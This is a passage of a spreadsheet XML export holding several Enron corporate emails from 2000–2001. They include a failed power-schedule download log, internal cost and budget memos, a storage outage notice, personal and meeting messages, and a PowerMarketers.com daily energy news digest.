    <t>Tue, 1 May 2001 03:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 5/1/01; HourAhead hour: 10;  HourAhead schedule download failed. _x000D_
Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
ERROR: File O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001050110.txt is empty._x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001050110.txt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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
!!!Insufficient memory for this operation._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 08:44:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: EGM Charges for Avistar</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Mike,_x000D_
_x000D_
Does it sound right?_x000D_
_x000D_
Vince_x000D_
 -----Original Message-----_x000D_
From: 	Fellers, Diane R.  _x000D_
Sent:	Wednesday, May 30, 2001 9:31 AM_x000D_
To:	Kaminski, Vince J_x000D_
Cc:	Crenshaw, Shirley_x000D_
Subject:	EGM Charges for Avistar_x000D_
_x000D_
Vince,_x000D_
_x000D_
I have gotten notice from EGM that they want to charge your cost center for the use of a weather research system named Avistar that someone is your group is using.  The plan is to allocate part of the depreciation of the asset to your cost center.  The total cost will be $10,583 over a 3-year period so the cost will not be significant, but I wanted to be sure you were aware of and approved of this charge.  Please let me know._x000D_
_x000D_
Thanks,_x000D_
Diane_x000D_
X5-7996_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 16:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Labor Specific Response - BP Amoco's RFP</t>
  </si>
  <si>
    <t xml:space="preserve">T:  Would you please print this and attached and file in BP amoco file?  _x000D_
Thanks.  MHC_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 05/04/2000 11:06 _x000D_
PM ---------------------------_x000D_
From: Rick Johnson@ENRON on 05/02/2000 12:03 PM_x000D_
To: Glenn Wright/Corp/Enron@ENRON, Bob Carter/HOU/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Labor Specific Response - BP Amoco's RFP_x000D_
_x000D_
Bob, Glenn;  attached word doc provides our recommended responses to BP _x000D_
Amoco. _x000D_
Michelle indicates that we are requesting copies of collective bargaining / _x000D_
union agreements.  Please let me know if I can be of further assistance.  _x000D_
_x000D_
                 Regards,  Rj                    _x000D_
</t>
  </si>
  <si>
    <t>Martha/Donna Dashboard</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Martha/Donna Dashboard_x000D_
_x000D_
Date:		1/26/2001_x000D_
Time:		10:00 AM - 11:00 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 14:53:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Solar Migration - Outage - October 13-14</t>
  </si>
  <si>
    <t>_x000D_
	The Enterprise Storage Team will be migrating UNIX home directories and applications to new hardware on October 13 and 14, 2001.  The migration will begin on Saturday the 13th at 7:00 PM and will be completed by 1:00 AM on Sunday, October 14, 2001._x000D_
_x000D_
	The migration requires a total system outage, so home directories and applications will not be available during the above time period.  Please log off before you leave for the weekend._x000D_
	Development teams members will test all migrated applications on Sunday, October 14, 2001._x000D_
_x000D_
Bob Ambrocik_x000D_
Enterprise Storage Team_x000D_
EB 3429F_x000D_
x5-4577_x000D_
bob.ambrocik@enron.com</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 11:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>travel plans</t>
  </si>
  <si>
    <t>I just reserved some unbelievably expensive rooms for amanda's graduation in _x000D_
May.  If you were ever going to see Jefferson country,  graduation is in _x000D_
May.  Amanda says the place I reseved is fabulous._x000D_
_x000D_
_x000D_
Linda Hayman_x000D_
Skadden, Arps,Slate, Meagher &amp; Flom, LLP_x000D_
4 Times Square, 42nd Floor_x000D_
New York, NY  10036_x000D_
T:  212-735-2637_x000D_
F:  917-777-2637_x000D_
_x000D_
_x000D_
------------------------------------------------------_x000D_
This e-mail, and any attachments thereto, is intended only for use by the _x000D_
addressee(s) named herein and may contain legally privileged and/or _x000D_
confidential information.  If you are not the intended recipient of this _x000D_
e-mail, you are hereby notified that any dissemination, distribution or _x000D_
copying of this e-mail, and any attachments thereto, is strictly prohibited.  _x000D_
If you have received this e-mail in error, please immediately notify me at _x000D_
(212) 735-3000 and permanently delete the original and any copy of any e-mail _x000D_
and any printout thereof._x000D_
_x000D_
Further information about the firm, a list of the Partners and their _x000D_
professional qualifications will be provided upon request._x000D_
_x000D_
 - Linda Hayman.vcf</t>
  </si>
  <si>
    <t>Tue, 8 Feb 2000 08:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Wednesday meeting</t>
  </si>
  <si>
    <t>Janel_x000D_
_x000D_
I'm not sure.  I thought the meeting was being set up to coordinate efforts _x000D_
between regulatory, legal and ENA and EES.  The meeting was requested by _x000D_
Christi Nicollay.</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 20:21:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jay.yparraguirre@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'deborah.pritt@enron.com', 'chris.lambert@enron.com', 'tracy.geaccone@enron.com'})</t>
  </si>
  <si>
    <t>2002 Plan Assessments as of 10/19/01 for EREC</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the updated version of the 2002 plan assessments from Enron Net Works (ENW) for your business unit.  We are sending revisions due to several changes, including increases in Corporate and other business unit allocations, and reductions in ENW expenditures.  _x000D_
_x000D_
This intercompany billing invoice now includes pass throughs and capital for your information.  Consistent with 2001, pass through billings (long distance, market data, WAN, etc.) will not be included in the standard assessments ("8xxxxxxx" accounts).  They will be posted directly to direct expenses ("52502000" accounts) at the cost center level.  This pass through number is only a high level place holder and is not intended to replace the dollars already being budgeted for by each cost center owner._x000D_
_x000D_
If you have any questions, you can contact Kevin May at x52508 and he will answer any questions or direct you to the correct person._x000D_
_x000D_
If you are not the correct person to receive these assessments or if there is someone else that you would like to include in this process, please reply back to me with this information and I will add them to the contact list for future correspondence._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jay_x000D_
x53813_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 15:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PowerMarketers.com Daily Power Report for 6 April 2001</t>
  </si>
  <si>
    <t>ANNOUNCING: DAILY POWER REPORT GOES HTML!_x000D_
_x000D_
"Starting on Monday, April 9, the PowerMarketers.com Daily Power Report will _x000D_
be sent to you in HTML Format. This means you will be able to click on the _x000D_
headlines and go straight to the stories! Many of you have been clamoring for _x000D_
this for a long time-- it's coming!!! But for those who can't read html, you _x000D_
can still get the text version (or both text and html for that matter). Just _x000D_
go to: http://www.retailenergy.com/headsel.htm_x000D_
_x000D_
Thanks for reading"_x000D_
_x000D_
======================================================================_x000D_
The Industry's Preferred Source For Breaking Energy News And Information_x000D_
http://www.powermarketers.com_x000D_
----------------------------------------------------------------------_x000D_
T H E P O W E R M A R K E T E R S .C O M P O W E R R E P O R T_x000D_
_x000D_
Today's Headlines From POWERMARKETERS.COM_x000D_
_x000D_
Subscriptions to The PowerMarketers.com Power Report are free - you will _x000D_
never be charged._x000D_
_x000D_
You may redistribute this e-mail without change. You may not redistribute _x000D_
stories._x000D_
_x000D_
To register for a free subscription, point your browser to: _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
Attend_x000D_
_x000D_
  PROJECT FINANCE: THE TUTORIAL_x000D_
        April 23-25 2001 NY NY_x000D_
_x000D_
*The Best Available Introduction to Project Finance for Developers, Lenders_x000D_
and Other Project Participants_x000D_
_x000D_
* Voted Best in Its Field by Over 2500 Attendees_x000D_
_x000D_
* Fully Updated for Today's Merchant Power Environment!_x000D_
_x000D_
and_x000D_
_x000D_
  PROJECT STRUCTURING IN THE REAL WORLD:_x000D_
       ADVANCED  SEMINAR_x000D_
        April 26-27 NY NY_x000D_
_x000D_
* Recognize and Surmount the Deal-Breakers in Project Financings_x000D_
_x000D_
* Designed for the Active Market Participant_x000D_
_x000D_
* Gain Insights from Nationally Recognized Financiers: Richard D. Grant &amp;_x000D_
Robert O. Gurman_x000D_
_x000D_
 EARLY BIRD DISCOUNT EXTENDED UNTIL MARCH 30!  REGISTER NOW!_x000D_
_x000D_
Download the conference brochure at:_x000D_
_x000D_
          http://www.pmaconference.com/pfweek.pdf_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
NEW!!!_x000D_
_x000D_
ENERGY JOBS WEEKLY_x000D_
_x000D_
New from PowerMarketers.com, a newsletter in pdf format which includes all _x000D_
the new job postings on the PowerMarketers.com for the past week, updated _x000D_
every weekend.    Download it, print it, archive it, FREE._x000D_
_x000D_
For the current issue of ENERGY JOBS WEEKLY, download at:_x000D_
_x000D_
http://www.pmaconference.com/040101EnergyJobs.pdf_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
--------------------T O P S T O R I E S--------------------_x000D_
_x000D_
Top Stories (April 5)_x000D_
_x000D_
CALIFORNIA BOND SALE TO EXCEED $10B TO AVOID HIGHER POWER RATE_x000D_
California will have to sell bonds in excess of $10 billion to finance _x000D_
wholesale power purchases in order to avoid 80% to 100% rate increases on the _x000D_
state's electricity consumers, the state's Director of Finance said he was _x000D_
advised by bond underwriter J.P. Morgan Chase &amp; Co._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
04/05/eng-djn/eng-djn_000053_26_0810009599663_x000D_
_x000D_
CALIFORNIA STATE ASSEMBLY APPROVES ENERGY CONSERVATION BILL_x000D_
The California state Assembly approved 74-1 a $710 million energy _x000D_
conservation bill Wednesday. The bill was sent back to the Senate for another _x000D_
vote._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
04/05/eng-djn/eng-djn_000052_85_4011123348027_x000D_
_x000D_
SOLAR-ENERGY BUSINESS SURGES IN CALIFORNIA_x000D_
Solar energy systems aren't just on the roof, they're also going through the _x000D_
roof in popularity._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/04/05/krtbn/0000-0396-SK-SOLAR-POWER_x000D_
_x000D_
SMOKING GUN IN NEW YORK ELECTRIC DRAMA? SOME SAY ARTICLE 10_x000D_
Five members of a New York state board ultimately decide which power plants _x000D_
get built in the state. Their bible is a tough set of rules known as Article _x000D_
10, a statute of the state's 1992 public service law._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
04/05/eng-djn/eng-djn_191356_176_598403248936''_x000D_
_x000D_
NEW ORLEANS-BASED POWER FIRM ASKS TEXAS FOR 22 PERCENT REVENUE HIKE_x000D_
Entergy Corp. will ask Texas regulators this week to approve a revenue _x000D_
increase of 22 percent for its distribution system when deregulation begins _x000D_
in January._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/04/05/krtbn/0000-0022-BE-ELECTRIC_x000D_
_x000D_
POWER PLANT PROJECT PROGRESSING_x000D_
A St. George, Utah, company is on the last leg of a decade-long project that _x000D_
could put a hydroelectric power plant on Blue Diamond Hill on the western _x000D_
outskirts of Las Vegas._x000D_
http://199.97.97.163/IMDS%PMANAT0%read%/home/content/users/imds/feeds/lvrj/200_x000D_
1/04/05/eng-lvrj_business/eng-lvrj_business_183806_121_386986346915_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
DOW JONES NEWSWIRES_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: _x000D_
http://199.97.97.79/IMDS|PMADJN0,PMADJN1,PMADJN2,PMADJN3,PMADJN4|index_x000D_
_x000D_
Reliant Sees 728-MW Plant Near Chicago Up By June 1_x000D_
_x000D_
Dynegy Says 3 S US Plants, 1,165-MW Due Up For Summer&gt;DY/N_x000D_
_x000D_
Smoking Gun In NY Electric Drama? Some Say Article 10_x000D_
_x000D_
SUBSCRIBERS:RWE Withdraws Cantabrico Bid Already Reported_x000D_
_x000D_
Mexichem, El Paso To Build Power Plant In Mexico_x000D_
_x000D_
UK Kickstarts Wind Pwr Development With 13 Seabed Leases_x000D_
_x000D_
ABB To List Shares Apr 6 On New York Stock Exchange_x000D_
_x000D_
ABB NYSE Listing -2: Will List Under Symbol "ABB"_x000D_
_x000D_
PRESS RELEASE: S&amp;P Comments On Calif Utils Credit Quality_x000D_
_x000D_
S&amp;P: Calif Utils Considering Multibillion Dlr Write-Offs_x000D_
_x000D_
Lindsey Says US In Business Cycle Downturn_x000D_
_x000D_
ABB Abandons Bid For Belgium Real Software's US Unit_x000D_
_x000D_
Cantabrico/Ferroatlantica -2: Hopes For Stability &gt;E.HIC_x000D_
_x000D_
Cantabrico Bd Approves Ferroatlantica Takeover Offer_x000D_
_x000D_
Bush May Pull Back Appliance Energy Efficiency Standards_x000D_
_x000D_
Calif Bond Sale To Exceed $10B To Avoid Higher Pwr Rate_x000D_
_x000D_
Calif State Assembly Approves Energy Conservation Bill_x000D_
_x000D_
FREE TRIAL: For a free trial of the Dow Jones Energy Service go to_x000D_
www.dowjonesnews.com, and click "create account," or call_x000D_
1-800-223-2274._x000D_
_x000D_
----------------------------------------------------------------------_x000D_
N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-nat.htm_x000D_
_x000D_
Stone Energy Corporation Provides Operations Update_x000D_
_x000D_
SCE Responds to Governor Davis' Energy SpeechGov. Gray Davis Gave A Short _x000D_
Speech Thursday on The California Energy Crisis. The Following Response to _x000D_
The Governor's Comments Is from Stephen E. Frank, Chairman, President And CEO _x000D_
of Southern California Edison_x000D_
_x000D_
The Energy Crunch: Baird Calls for Limits on Power Price Hike_x000D_
_x000D_
Ryan Energy Technologies Inc. Introduces Electromagnetic (Em) Mwd Services _x000D_
Into Ryan's Traverse City, Michigan Operation_x000D_
_x000D_
Study: Risk of Energy Shutoffs Across U.S._x000D_
_x000D_
PG&amp;E Defaults on Payments to Los Alamos Energy_x000D_
_x000D_
Rer Announces the Availability of Industrial Energy_x000D_
_x000D_
Power Plant Project Progressing_x000D_
_x000D_
American Energy Reports Additional Results from Jacobabad 3 And Settlement of _x000D_
Northern Lights Lawsuit_x000D_
_x000D_
Advisory/Energy Show Held During Energy Crisis_x000D_
_x000D_
Half Of City Voters Polled Fear Energy Crises_x000D_
_x000D_
Repeat/American Energy Reports Additional Results from Jacobabad 3 And _x000D_
Settlement of Northern Lights Lawsuit_x000D_
_x000D_
Reader's View Address West's Energy Crisis_x000D_
_x000D_
Energy CO-OP Files Lawsuit Against CG&amp;E_x000D_
_x000D_
Discounts for Power Customers_x000D_
_x000D_
US/Canada Spot Natural Gas: Malin Soars, But Mkt Mostly Quiet_x000D_
_x000D_
Energy Debt May Soar_x000D_
_x000D_
Panel Backs Strict Rules for Power Plants_x000D_
_x000D_
D-8 Group to Set Up Energy Development Fund_x000D_
_x000D_
Golden Arch Resources Ltd - North Texas Well to Be Completed As Natural Gas _x000D_
Producer_x000D_
_x000D_
Burning Corn for Heat Provides Energy Shortcut_x000D_
_x000D_
Environmental Organizations Defeat Coal Industry Global Warming Slapp Suit; _x000D_
Federal Judge Dismisses Coal Industry Suit Attempting to Prevent Debate Over _x000D_
Global Warming_x000D_
_x000D_
Rer Announces the Availability of Industrial Energy Profiles Through Eshapes_x000D_
_x000D_
Emc (Energy Management Company) Now Powered by Nicor Energy_x000D_
_x000D_
Power Rate Caps Sought for West Congress: House Democrats Fault Bush for _x000D_
Inaction in Crisis_x000D_
_x000D_
Aquila Energy Corp Increased Its Price from $17-$22 to $21-$23._x000D_
_x000D_
Hammond Power Solutions Inc - Signs Supply Contract Worth $3 Million_x000D_
_x000D_
Repeats: Energy Volume And Open Interest Totals-APR 5_x000D_
_x000D_
Reliant Energy Plans Two Additional Power Generation Facilities in Nevada; _x000D_
Bighorn Peaking Facility on Line by June 2002; Combined-Cycle Facility on _x000D_
Line by June 2003_x000D_
_x000D_
Lexxor Energy Inc - Proposed Re-Designation And Consolidation of Class A _x000D_
Shares_x000D_
_x000D_
Sierra Pacific Power Company Goes Live with Sct's Customer Management Solution_x000D_
_x000D_
Power Generators Up Sales Profit by 38% To Pln 1.46 Bln in 2000, Output _x000D_
Highest in 10 Yrs_x000D_
_x000D_
Florida Power to Drop Tower as Headquarters_x000D_
_x000D_
City Heeds Davis' Call to Reduce Energy Use_x000D_
_x000D_
World Bank: Gef Announces Launch of First Solar Venture Fund Focused on _x000D_
Developing World_x000D_
_x000D_
Major Wind Power Project to Be Built in West Texas_x000D_
_x000D_
Midamerican Energy Company Selects Altra for Middle And Back-Office Gas _x000D_
Operations_x000D_
_x000D_
Puget Sound Energy Revises Some Pricing_x000D_
_x000D_
Clayton Williams Energy Provides Financial Guidance for 2001_x000D_
_x000D_
Xantrex Honored for Power Efforts_x000D_
_x000D_
County Looks at Methane Power_x000D_
_x000D_
Power Supply in Four Outputs_x000D_
_x000D_
Docucorp Will Present Utility Solutions at Sct Summit_x000D_
_x000D_
Alts President Sends Letter to FCC About RBOC Power Charges_x000D_
_x000D_
State Demonstrates 'Energy of the Future'Tnrcc, Senator Brown Host First _x000D_
Public Demonstration of Hydrogen Fuel Cell_x000D_
_x000D_
ENEL begins sale procedure of its second power generation company_x000D_
_x000D_
The Options Dwindle: State, Feds Energy Solutions Limited_x000D_
_x000D_
Greenspan Says Energy Woes Likely, But No Crisis Yet Policymakers Also _x000D_
Predict Country Will Dodge Slipping Into Recession_x000D_
_x000D_
Energy Outline Coming_x000D_
_x000D_
Gamesa claims 2nd position in world wind-driven generator manufacturing_x000D_
_x000D_
Power-plant Payments Generate Controversy_x000D_
_x000D_
Meralco rate hike provisional authority not urgent: Energy Regulatory Board_x000D_
_x000D_
California secures 4.125 bln usd energy funds in anticipation of bond issue_x000D_
_x000D_
Manhattan Firm Makes Utility Deal_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
I N T E R N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-intr.htm_x000D_
_x000D_
Apco Argentina Inc. And Globex Energy, Inc. Agree to Merger_x000D_
_x000D_
Kms Power Issues Annual Financial Results for Year 2000_x000D_
_x000D_
State Power Companies Earn US$661mn - Peru_x000D_
_x000D_
Bndes Receives 53 Small Hydro Proposals - Brazil_x000D_
_x000D_
New Energy Secretary Expected to Promote De-regulation - Argentina_x000D_
_x000D_
Luscar to Supply Coal to Gener - Chile_x000D_
_x000D_
Japan Natural Energy Gets Orders from 20 Firms_x000D_
_x000D_
Nippon Steel Supplies Power to M'bishi Buildings_x000D_
_x000D_
Japan's Power Demand Up 2.6 Pct in Feb._x000D_
_x000D_
Energy Ministry, Ebrd Discuss Energy Reforms_x000D_
_x000D_
Top Energy Summaries - Thursday, April 05, 2001 - 5:04 PM_x000D_
_x000D_
Top Energy Summaries - Thursday, April 05, 2001 - 2:14 PM_x000D_
_x000D_
The Answer Is Blowing in the Wind_x000D_
_x000D_
Guizhou Panjiang Cleaned Coal To Issue IPO in Shanghai's A-share Market On _x000D_
April 9_x000D_
_x000D_
Top Energy Summaries - Thursday, April 05, 2001 - 12:32 PM_x000D_
_x000D_
Winds Aloft: When Radio Free Europe Flew Balloons_x000D_
_x000D_
Smi: Looking at the Future of Energy Trading_x000D_
_x000D_
Brazil: Cesp Parana's New Owner to Expand Energy Generating Capacity_x000D_
_x000D_
Brazil: Copesul's Production Backs 3rd Generation Petrochemicals_x000D_
_x000D_
Enel approves sale of second power company_x000D_
_x000D_
Top Energy Summaries - Thursday, April 05, 2001 - 9:23 Am_x000D_
_x000D_
Friends of the Earth: Dawn of New Era: 18 Offshore Wind Farms Unveiled; _x000D_
Thousands of New Jobs As Green Power Market Takes-Off_x000D_
_x000D_
Top Energy Summaries - Thursday, April 05, 2001 - 7:43 Am_x000D_
_x000D_
Brazil: El Paso to Set Up A 700 Mw Thermal Electric Power Facility_x000D_
_x000D_
Brazil : Bndes Concentrates in Power Generating Sector_x000D_
_x000D_
Abbot, PowerGen wind energy jv pre-qualified for Crown Estate wind farm_x000D_
_x000D_
Teleadapt: Teleadapt to Offer PC Protection for Users at Home And Away; New _x000D_
Protection Packs Guard Against Power Surges And Spikes, Whilst Preventing _x000D_
Potential Damage Caused by Incompatible Telephone Lines_x000D_
_x000D_
UK Government: Government Gives Go Ahead for Combined Heat And Power Station _x000D_
at Jaguar Plant_x000D_
_x000D_
China's Trade of Machinery &amp; Electric Products Doubles_x000D_
_x000D_
20 Firms to Buy Electricity from Wind-Powered Plants_x000D_
_x000D_
Philippines' National Power Corp Cuts Rates_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
KRT DAILY ENERGY NEWS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at http://www.powermarketers.com/pma-krt.htm_x000D_
_x000D_
Litchfield, Conn., Fuel Company Decides to Shorten Its Name_x000D_
_x000D_
California Utilities Ask for Halt to Tulsa, Okla.-Based Firm's Power Rates_x000D_
_x000D_
Energy Bills' Future Unknown As Washington State Lawmakers Rethink Situation_x000D_
_x000D_
Chicago-Based Power Company Plans to Expand Marketing, Trading Divisions_x000D_
_x000D_
ST. Louis-Based Natural Gas Firm Proposes Rate Cut_x000D_
_x000D_
Solar-Energy Business Surges in California_x000D_
_x000D_
State Aid Sought for Low-Income Customers of Philadelphia-Based Gas Utility_x000D_
_x000D_
Pennsylvania Official Says State Can Avoid California-Style Energy Crisis_x000D_
_x000D_
Municipal Wisconsin Utilities Group Protests Proposed Budget Revision_x000D_
_x000D_
Experts Predict Healthy Power Supplies for the Midwest Summer_x000D_
_x000D_
Wisconsin Energy Company Defends Construction of Power Plants_x000D_
_x000D_
Escalon, Calif., Area Won't Find Power Bill Relief in Utility Agreement_x000D_
_x000D_
California Legislators Examine Utility Tax Levels_x000D_
_x000D_
Los Angeles Mayor Proposes Energy Conservation Plan_x000D_
_x000D_
Missouri Gas Energy Wants to Begin Charging A Set Price for Gas_x000D_
_x000D_
Grapevine, Texas-Based Oil Firm Expects Large Profits This Summer_x000D_
_x000D_
Florence, Ore., to Spend $2 Million of Well Development Project_x000D_
_x000D_
Duluth, Minn.-Area Electrical Cooperative Appoints Communication Manager_x000D_
_x000D_
California Public Utilities Official Favors Wholesale Price Caps_x000D_
_x000D_
Proposed Utility Merger Fell Apart Over `Takeover' Concerns_x000D_
_x000D_
New Orleans-Based Power Firm to Ask Texas Regulators for Revenue Increase_x000D_
_x000D_
New Orleans-Based Power Firm Asks Texas for 22 Percent Revenue Hike_x000D_
_x000D_
Santa Fe, N.M., Conference Underscores Challenges for Utility Industry_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
REUTERS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: _x000D_
http://news.powermarketers.com/news/articles/ElectricPower.html_x000D_
_x000D_
UPDATE 1-Brazil adopts plan to avoid power cuts_x000D_
_x000D_
Pacific Gas &amp; Elec halts preferred dividend payments_x000D_
_x000D_
UPDATE 2-Sherritt wants access to Luscar Coal data_x000D_
_x000D_
UPDATE 1-Second NYPA turbine lawsuit verdict seen_x000D_
_x000D_
U.S. FERC releases Western power meeting schedule_x000D_
_x000D_
Philadelphia told to consider sale of utility_x000D_
_x000D_
U.S. Democrats push price cap plan for Western power markets_x000D_
_x000D_
U.S. green group seeks to save environmental programs_x000D_
_x000D_
Utility says not enough supply in NY for power competition_x000D_
_x000D_
Canada natgas prices rise on storage withdrawals_x000D_
_x000D_
UPDATE 1-RWE out of Cantabrico race, might look elsewhere_x000D_
_x000D_
TEXT-S&amp;P affirms AES Corp BB ratings_x000D_
_x000D_
UPDATE 2-S&amp;P worried PG&amp;E, Edison won't recover quickly_x000D_
_x000D_
US POWER-Trust the forecast? Energy trading desks do_x000D_
_x000D_
Reliant to build two Nevada natural-gas power plants_x000D_
_x000D_
Group of developing nations to set up energy fund_x000D_
_x000D_
UPDATE 2-Britain gears up for offshore wind power_x000D_
_x000D_
US POWER-Success spells trouble for Calif. energy traders_x000D_
_x000D_
HEWsays to accept joint Bewag deal with Mirant_x000D_
_x000D_
POLL-New Yorkers worried about summer energy shortage_x000D_
_x000D_
UPDATE 1-S&amp;P worried PG&amp;E, Edison won't recover quickly_x000D_
_x000D_
TEXT-Moody's maintains Citizens Communications long-term rtg_x000D_
_x000D_
INTERVIEW-Dutch utility Remu says still plans Endesa link_x000D_
_x000D_
S&amp;P worried PG&amp;E, Edison won't recover anytime soon_x000D_
_x000D_
Old coal may breathe new 'green' energy into UK_x000D_
_x000D_
NW Natural sees lower than expected profits ahead_x000D_
_x000D_
Enron issues arbitration notice to India govt_x000D_
_x000D_
World Bank cuts funding for Kenya power-paper_x000D_
_x000D_
U.S. Duke Energy seeks power stations in Europe-FT_x000D_
_x000D_
*********************************************************_x000D_
NEW on the POWERMARKETERS.COM TRAINING PAGE_x000D_
*********************************************************_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
Coming soon! PMA Power Markets 2001 presentations, taped at the Aladdin _x000D_
Hotel, Las Vegas, March 15-16, 2001._x000D_
_x000D_
Don't forget you can choose to stream the presentation immediately over the _x000D_
web, or download it to your computer for later viewing-- Free!_x000D_
_x000D_
RealVideo-based powerpoint-based presentations, with the accompanying audio. _x000D_
Running about 30 minutes each, selections include:_x000D_
_x000D_
ELECTRONIC TRADING. Power is following natural gas to become an _x000D_
electronically-traded commodity. The products, the technology and the future _x000D_
of electricity transactions. Kevin Sluder, Vice President, HoustonStreet _x000D_
Exchange._x000D_
_x000D_
NUTS AND BOLTS OF RETAILING. What it takes to put an energy retailing _x000D_
operation together-- the cash and credit requirements, back office, _x000D_
information technology, staffing, marketing, sales and organizational _x000D_
considerations. Andrew Serri, Vice President, AmerenEnergy Marketing._x000D_
_x000D_
RETAIL: WHAT WENT WRONG, HOW TO FIX IT. Retail electric deregulation has thus _x000D_
far been an underwhelming success, but a great deal has been learned, and it _x000D_
is eminently fixable. By Dr. John O'Brien, Principal, Skipping Stone_x000D_
_x000D_
MANAGING BILLING. The complex requirements for managing billing and _x000D_
commodities in the deregulating energy industry cannot be met with current _x000D_
CIS and CRM technology. Energy Retailers must embrace the next evolution of _x000D_
energy customer management (ECM) solutions. Paul Grey, Chief Technology _x000D_
Officer, Peace Software._x000D_
_x000D_
THE INTERNET AND THE VELOCITY FACTOR. Greater price transparency, faster _x000D_
execution, reduced transaction costs, increased number and frequency of _x000D_
transactions and increased specialization are just some of the changes to _x000D_
energy markets wrought by the web, and it's just beginning. Implecations of _x000D_
the internet for energy markets. E. Russell "Rusty" Braziel, Chairman and _x000D_
Director, Altra Energy Technologies._x000D_
_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
****************************************_x000D_
THE PowerMarketers.com ENERGYYELLOWPAGES_x000D_
****************************************_x000D_
http://www.energyyellowpages.net_x000D_
_x000D_
Where to go when you're looking for:_x000D_
Billing Systems, Brokers, Call Centers, Coal Marketers, Computers &amp;_x000D_
Networks, Conference Houses, Energy Management, Engineering Services,_x000D_
Environmental Services, Exchanges &amp; Clearing Houses, Executive Search_x000D_
Services, Financial Services, Gas Marketers, Information Services, Internet_x000D_
Services, Legal Services, Management Consulting , Marketing, Meters, Power_x000D_
Marketers, Powerplant Development, Powerplant Equipment, Risk Management,_x000D_
Sales, Software, Trade Associations, Training, Weather Services and more!_x000D_
Check it out today! http://www.energyyellowpages.net/_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
OTHER NEWS &amp; INFORMATION FEATURES ON POWERMARKETERS.COM_x000D_
----------------------------------------------------------------------_x000D_
_x000D_
PRICEWATERHOUSECOOPERS NEXT-DAY POWERTRAX ELECTRIC PRICE INDEX:_x000D_
Access online at: http://www.powermarketers.com/p-trax.htm_x000D_
_x000D_
ELECTRICITY SPOT PRICES:_x000D_
Access online at: http://www.dtnergy.com/pma/spot.cfm_x000D_
_x000D_
ELECTRICITY FUTURES PRICES:_x000D_
Access online at: http://www.dtnergy.com/pma/electric.cfm_x000D_
_x000D_
NATURAL GAS FUTURES PRICES:_x000D_
Access online at: http://www.dtnergy.com/pma/gas.cfm_x000D_
_x000D_
THE PowerMarketers.com JobSite:_x000D_
Access online at: http://www.powermarketers.com/pmajobs.htm_x000D_
